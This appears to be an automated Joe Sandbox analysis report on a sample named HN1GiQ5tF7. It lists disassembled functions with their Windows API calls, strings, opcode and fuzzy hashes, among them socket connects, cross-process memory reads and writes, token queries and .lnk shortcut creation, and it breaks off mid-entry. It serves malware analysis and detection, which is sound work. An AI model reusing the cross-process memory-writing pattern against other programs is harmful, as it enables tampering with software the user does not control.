Opcode ID: 8fef317b4ccfd76fee2da214d5f69ef43247af29070f9c3c302f7141166718f3
Instruction ID: 8f5993f54d43cbabfb130bad927f44c1198cdfe353f36aac816d87bab05790b6
Opcode Fuzzy Hash: 8fef317b4ccfd76fee2da214d5f69ef43247af29070f9c3c302f7141166718f3
Instruction Fuzzy Hash: FE210831504A158BDB15AB78DC52FEA23AFAF153B0F10A06AF449D72C0EF60D985CA55

Function 00688B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0068A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0068A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00688BD3
WSAGetLastError.WSOCK32(00000000), ref: 00688BE2
connect.WSOCK32(00000000,?,00000010), ref: 00688BFE

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: d3f1c261c86356f98b694eef2c65d73e4710ac4dba606f09dd1de0ceee508d90
Instruction ID: 2ac73dabc7ecbbe41dd55e2d586d6144617b04a8a136614d146382353b69a634
Opcode Fuzzy Hash: d3f1c261c86356f98b694eef2c65d73e4710ac4dba606f09dd1de0ceee508d90
Instruction Fuzzy Hash: FD21FD712002059FCB00AF28CC85BBE73AAEF48320F04861DF906AB392DF74AC018B61

Function 00688420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00688441
GetForegroundWindow.USER32 ref: 00688458
GetDC.USER32(00000000), ref: 00688494
GetPixel.GDI32(00000000,?,00000003), ref: 006884A0
ReleaseDC.USER32(00000000,00000003), ref: 006884DB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f8b10171fa313f8141477640ae306b110824fdcbf7766583c39def349ed4ac6d
Instruction ID: 4850ad57db8ce3e1239a396c4406baf2aa3c4fd34ff69f909fb4ba72ecef4b2c
Opcode Fuzzy Hash: f8b10171fa313f8141477640ae306b110824fdcbf7766583c39def349ed4ac6d
Instruction Fuzzy Hash: 02218476A00204AFD750EFA4D885A9EB7E6EF48301F04C57DE9599B251DB70AD40CB60

Function 0064AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0064AFE3
SelectObject.GDI32(?,00000000), ref: 0064AFF2
BeginPath.GDI32(?), ref: 0064B009
SelectObject.GDI32(?,00000000), ref: 0064B033

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 77ef99ade07321552ab9b17aa218184aa3522e4fb53e43939cbbdd0ba01a0cc7
Instruction ID: 34f498c02c4b705affbb3112b25d15beb252e9171f2f9336143888fb9c471756
Opcode Fuzzy Hash: 77ef99ade07321552ab9b17aa218184aa3522e4fb53e43939cbbdd0ba01a0cc7
Instruction Fuzzy Hash: 442183B0800305EFDB10DF55EC44BAA7B6BB711796F18631AE421DA1A0D3718995CF55

Function 0065217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 006521A9
CreateThread.KERNEL32(?,?,006522DF,00000000,?,?), ref: 006521ED
GetLastError.KERNEL32 ref: 006521F7
_free.LIBCMT ref: 00652200
__dosmaperr.LIBCMT ref: 0065220B

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: d75776aed94b45bb9dfa31577a10f7152cfbca598730d4f7cd79e412305b581c
Instruction ID: 63066993d8ed376a1e87c2dd0a9bfa351b6a991cccde4ab1591d0cc6b60aa870
Opcode Fuzzy Hash: d75776aed94b45bb9dfa31577a10f7152cfbca598730d4f7cd79e412305b581c
Instruction Fuzzy Hash: 021108361047476F9B21AF65EC42DAB379BEF02771F10012DFE1486251EB32D84986A4

Function 0066ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0066ABD7
GetLastError.KERNEL32(?,0066A69F,?,?,?), ref: 0066ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0066A69F,?,?,?), ref: 0066ABF0
HeapAlloc.KERNEL32(00000000,?,0066A69F,?,?,?), ref: 0066ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0066AC0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ddaede4cf2a1d2034db5a08634ede97c6ade45b1b8b6b64a2fcd8b1730218b81
Instruction ID: eab70cdd27343b61f0fbafddbd0dd8e6a53482615f5b1448750f45be228c7db9
Opcode Fuzzy Hash: ddaede4cf2a1d2034db5a08634ede97c6ade45b1b8b6b64a2fcd8b1730218b81
Instruction Fuzzy Hash: 06013CB5200205BFDB104FA9DC48DAB3BAEEF8A755B100529F945D7361EA71DC80CF61

Function 00677A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00677A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00677A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00677A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00677A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00677AD0

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8e43400313fe00c8c3b50aa3678ff81698421f3a3896155700316656454b04e1
Instruction ID: f6ee85e3a0dfb4f178c42fd30cb3b70e33c99b294f37fec0359ba93b12ec9bcd
Opcode Fuzzy Hash: 8e43400313fe00c8c3b50aa3678ff81698421f3a3896155700316656454b04e1
Instruction Fuzzy Hash: 02018CB5C04629EBEF00AFE8DC48ADDBB7AFF08301F004195E902B6250EB309694C7A5

Function 00669ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00669ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00669AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00669B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00669B15
CLSIDFromString.OLE32(?,?), ref: 00669B21

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 584ab93235398c39fc45751b72aef8dddb7f0d7b42fe1ed048f3e65f229196c9
Instruction ID: 8b5d704f4ef5e7a4abd80de65b32b42ffbce01af1eadf7f150fc03f48aa1be49
Opcode Fuzzy Hash: 584ab93235398c39fc45751b72aef8dddb7f0d7b42fe1ed048f3e65f229196c9
Instruction Fuzzy Hash: C1014BB6600219BFDB114F68ED44BAABAEEEB49752F148025FD05D6210E770DD849BB0

Function 0066AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0066AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0066AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0066AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0066AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0066AAAF

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9dba251544854f8eca10fcddf6600ec9cdf3969038c451aad0d48d83e32d8fe6
Instruction ID: c6657213523144845fda28df66b30003e2d35db51669f1323ead55306d5cc9d8
Opcode Fuzzy Hash: 9dba251544854f8eca10fcddf6600ec9cdf3969038c451aad0d48d83e32d8fe6
Instruction Fuzzy Hash: 9DF044712002197FD7115FE49C89EAB3BAEFF49754F00062AF941DB250E6609C41CA61

Function 0066AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0066AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0066AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0066AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0066AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0066AB10

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: fb377d8c12a33550b198b50b0a1884e35b7ec71788e67ab706299459346918f4
Instruction ID: 4286803752615db56347beeec80d33c36b829462d7c471ef4b05b4d70706a077
Opcode Fuzzy Hash: fb377d8c12a33550b198b50b0a1884e35b7ec71788e67ab706299459346918f4
Instruction Fuzzy Hash: 35F04FB12002097FEB111FA4EC88EBB3BAEFF46754F000129F941DB290DA609C418E61

Function 0066EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0066EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0066ECAB
MessageBeep.USER32(00000000), ref: 0066ECC3
KillTimer.USER32(?,0000040A), ref: 0066ECDF
EndDialog.USER32(?,00000001), ref: 0066ECF9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 99eb923e2d80730faa8430c3ec0c206460f3a5ba6a1526868f38cb017c21c8f6
Instruction ID: ef327a504ab0205c6c5d36b3320484e1e2dbd98542224d50bd54a182475ed085
Opcode Fuzzy Hash: 99eb923e2d80730faa8430c3ec0c206460f3a5ba6a1526868f38cb017c21c8f6
Instruction Fuzzy Hash: CD01C874500705ABEB345F10DE9EBD677BAFF00B05F001669B593A54E0EBF5AA85CB80

Function 0064B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0064B0BA
StrokeAndFillPath.GDI32(?,?,006AE680,00000000,?,?,?), ref: 0064B0D6
SelectObject.GDI32(?,00000000), ref: 0064B0E9
DeleteObject.GDI32 ref: 0064B0FC
StrokePath.GDI32(?), ref: 0064B117

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 18486517424296b5d313ea30657a6d68d03d1af1ddb9f3bcd2010a84861aec43
Instruction ID: ebb1e5ed3a8109290801e7c45c79c3b8deda3889d3d5607df797aa0fec814a24
Opcode Fuzzy Hash: 18486517424296b5d313ea30657a6d68d03d1af1ddb9f3bcd2010a84861aec43
Instruction Fuzzy Hash: B9F04F70004205EFCB21AF69EC0C7A43F67AB123A2F18A314F4258D1F0D7318AA6CF14

Function 0067F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0067F2DA
CoCreateInstance.OLE32(006BDA7C,00000000,00000001,006BD8EC,?), ref: 0067F2F2
CoUninitialize.OLE32 ref: 0067F555

Strings

.lnk, xrefs: 0067F28B, 0067F290, 0067F29E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 02a1ea234f42db9f82f220dd5e5cfa5451aeb799c29a896a4d81ad93dabd5b0b
Instruction ID: 39ab6baccf209299a6ee42fe2bac4c6e9a18d12fcd7826f4206d6e2f2a89a9af
Opcode Fuzzy Hash: 02a1ea234f42db9f82f220dd5e5cfa5451aeb799c29a896a4d81ad93dabd5b0b
Instruction Fuzzy Hash: 3CA15BB1104201AFD340EF64CC91DABB7EEEF98314F40491DF1569B192EB70EA49CBA6

Function 0067E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0063660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006353B1,?,?,006361FF,?,00000000,00000001,00000000), ref: 0063662F

CoInitialize.OLE32(00000000), ref: 0067E85D
CoCreateInstance.OLE32(006BDA7C,00000000,00000001,006BD8EC,?), ref: 0067E876
CoUninitialize.OLE32 ref: 0067E893

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

Strings

.lnk, xrefs: 0067E83B, 0067E84D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 64ff8b021e5e18ec22315b4805785c5842b7a613f3f229ac56fbabb1c0732f24
Instruction ID: 6157a9b4be42bb4c2230e51a41c9f8e6599bc19be35f4817a93c026019216d2b
Opcode Fuzzy Hash: 64ff8b021e5e18ec22315b4805785c5842b7a613f3f229ac56fbabb1c0732f24
Instruction Fuzzy Hash: 67A146756043019FCB50DF14C48495ABBE6BF89310F14899DF99A9B3A1CB32ED49CB91

Function 0065325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006532ED

Part of subcall function 0065E0D0: __87except.LIBCMT ref: 0065E10B

Strings

pow, xrefs: 006532C5, 006532E2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 9be30ebdb3fbe73ed23d338c35fbbd93f0b4cb5aa4eab9b942f706b196696555
Instruction ID: caf189feadb35439b8c9ba105b611427e848cce4c2acdbe54b8f08a92bf09ce7
Opcode Fuzzy Hash: 9be30ebdb3fbe73ed23d338c35fbbd93f0b4cb5aa4eab9b942f706b196696555
Instruction Fuzzy Hash: FF517C31A0860292CF196714C9013BA3B979B40B93F204D6CFCC5863E9DF368F9D9645

Function 00674606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,006CDC50,?,0000000F,0000000C,00000016,006CDC50,?), ref: 00674645

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 006746C5

Strings

THIS, xrefs: 00674703
REMOVE, xrefs: 00674676

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 05dc9b99dc7c279caa7b35328fd2855134cd02c7bb9ac38ee10a4e4b0446d52f
Instruction ID: 8b3a5ce6dbc440825cc310a5f6c4962d1bafc25d8dec0c16f6e1c2277b99388f
Opcode Fuzzy Hash: 05dc9b99dc7c279caa7b35328fd2855134cd02c7bb9ac38ee10a4e4b0446d52f
Instruction Fuzzy Hash: 6F417F74A002199FCF44EFA4C889AADB7B6FF49304F14C069E91AAB392DB34DD45CB54

Function 0066C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0067430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0066BC08,?,?,00000034,00000800,?,00000034), ref: 00674335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0066C1D3

Part of subcall function 006742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0066BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00674300

Part of subcall function 0067422F: GetWindowThreadProcessId.USER32(?,?), ref: 0067425A
Part of subcall function 0067422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0066BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0067426A
Part of subcall function 0067422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0066BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00674280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0066C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0066C28D

Strings

@, xrefs: 0066C2A5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c7eed710a768d4bee03e68b2f509c6b63c32a5d19a0a68bbd74b0a8a51bc0689
Instruction ID: 706178ac777d9c1cc96c36cb71b26280bf160eb29dfae35cc519f12ccac2a3ff
Opcode Fuzzy Hash: c7eed710a768d4bee03e68b2f509c6b63c32a5d19a0a68bbd74b0a8a51bc0689
Instruction Fuzzy Hash: AE415C72900218BFDB10DFA4CC95AEEB779AF09310F108099FA59B7181DB71AF85CB65

Function 0069A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006CDC00,00000000,?,?,?,?), ref: 0069A6D8
GetWindowLongW.USER32 ref: 0069A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0069A705

Strings

SysTreeView32, xrefs: 0069A6AA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
